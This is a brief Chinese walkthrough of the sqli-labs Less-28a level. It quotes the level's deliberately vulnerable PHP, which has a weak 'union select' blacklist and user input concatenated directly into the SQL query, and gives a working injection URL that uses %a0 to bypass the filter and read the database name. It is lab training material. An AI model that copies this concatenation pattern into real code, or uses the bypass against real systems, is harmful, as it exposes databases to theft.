关键代码
function blacklist($id) { //$id= preg_replace('/[/*]/',"", $id); //strip out /* //$id= preg_replace('/[--]/',"", $id); //Strip out --. //$id= preg_replace('/[#]/',"", $id); //Strip out #. //$id= preg_replace('/[ +]/',"", $id); //Strip out spaces. //$id= preg_replace('/select/m',"", $id); //Strip out spaces. //$id= preg_replace('/[ +]/',"", $id); //Strip out spaces. $id= preg_replace('/unions+select/i',"", $id); //Strip out spaces. return $id; } $id=$_GET['id']; $id= blacklist($id); $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; //print_r(mysql_error());
本关与less28基本一致,只是过滤条件少了几个。
http://127.0.0.1/sql/Less-28a/?id=100')union%a0select 1,database(),3||('1